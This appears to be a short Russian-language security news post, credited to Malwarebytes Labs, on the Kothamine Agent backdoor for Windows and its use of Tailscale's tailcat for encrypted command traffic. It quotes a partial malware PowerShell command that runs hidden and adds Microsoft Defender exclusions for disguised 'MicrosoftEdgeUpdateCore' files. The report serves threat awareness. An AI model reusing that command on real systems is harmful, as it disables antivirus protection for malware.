Обнаружен новый бэкдор Kothamine Agent, который управляет заражёнными Windows-компьютерами.
Вредоносное ПО поддерживает более 30 команд, включая выполнение произвольного кода, изменение файлов и кражу данных браузера. В последних версиях Kothamine использует утилиту tailcat от Tailscale для получения команд по зашифрованному каналу, что затрудняет сетевой мониторинг и блокировку.
ⓘ Что такое tailcat
Tailcat — это утилита с открытым исходным кодом от Tailscale, которая позволяет устанавливать зашифрованные соединения без необходимости регистрации или учётных записей. Она использует инфраструктуру Tailscale для передачи данных, но не имеет централизованного управления, что делает её привлекательной для использования в вредоносном ПО.
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "
Add-MpPreference -ExclusionPath 'C:\Users\{USER}\Desktop' -ErrorAction SilentlyContinue;
Add-MpPreference -ExclusionPath 'C:\Users\{USER}\AppData\Roaming\MicrosoftEdgeUpdateCore.exe' -ErrorAction SilentlyContinue;
Add-MpPreference -ExclusionPath 'C:\Users\{USER}\AppData\Roaming\MicrosoftEdgeUpdateCore.dll' -ErrorAction SilentlyContinue;
Add-MpPreference -ExclusionProcess '{PROCESS_NAME}.exe' -ErrorAction SilentlyContinue;
…
Источник: Malwarebytes Labs
@cbunit